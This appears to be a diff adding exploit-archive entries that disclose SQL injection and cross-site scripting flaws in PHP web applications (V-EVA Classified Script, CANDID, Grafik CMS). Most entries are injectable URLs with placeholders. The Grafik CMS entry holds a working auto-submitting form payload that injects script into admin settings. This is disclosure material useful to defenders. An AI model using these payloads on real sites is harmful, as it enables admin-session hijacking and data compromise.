+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?view=[sqli] 
--- a/platforms/php/webapps/34218.txt
+++ b/platforms/php/webapps/34218.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41204/info
+
+V-EVA Classified Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+V-EVA Classified Script 5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/classified_img.php?clsid=[SQLI] 
--- a/platforms/php/webapps/34219.txt
+++ b/platforms/php/webapps/34219.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41216/info
+
+CANDID is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/image/view.php?image_id=[SQLI]
--- a/platforms/php/webapps/34220.txt
+++ b/platforms/php/webapps/34220.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41216/info
+ 
+CANDID is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/image/view.php?image_id=[XSS] 
--- a/platforms/php/webapps/34222.html
+++ b/platforms/php/webapps/34222.html
@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/41227/info
+
+Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Grafik CMS 1.1.2 is vulnerable; other versions may be affected. 
+
+<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
+	<input type="hidden" name="page_title" value="page title" />
+	<input type="hidden" name="page_menu" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
+	<input type="hidden" name="id" value="1" />
+	<input type="hidden" name="page_content" value="some page content" />
+	<input id="sbmt" type="submit" name="submit" value="Modifier" />
+</form>
+<script>
+document.getElementById(&#039;sbmt&#039;).click();
+</script>
+
+
+<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
+	<input type="hidden" name="name" value="site title" />
+	<input type="hidden" name="admin_mail" value="example@example.com" />
+	<input type="hidden" name="keywords" value="" />
+	<input type="hidden" name="description" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
+	<input type="hidden" name="site_url" value="http://www.example.com/" />
+	<input type="hidden" name="seo_url" value="0" />
+	<input type="hidden" name="mailing" value="1" />
+	<input type="hidden" name="template" value="templates/default" />
+	<input id="sbmt" type="submit" name="submit" value="Valider" />
+</form>
+<script>
+document.getElementById(&#039;sbmt&#039;).click();
+</script>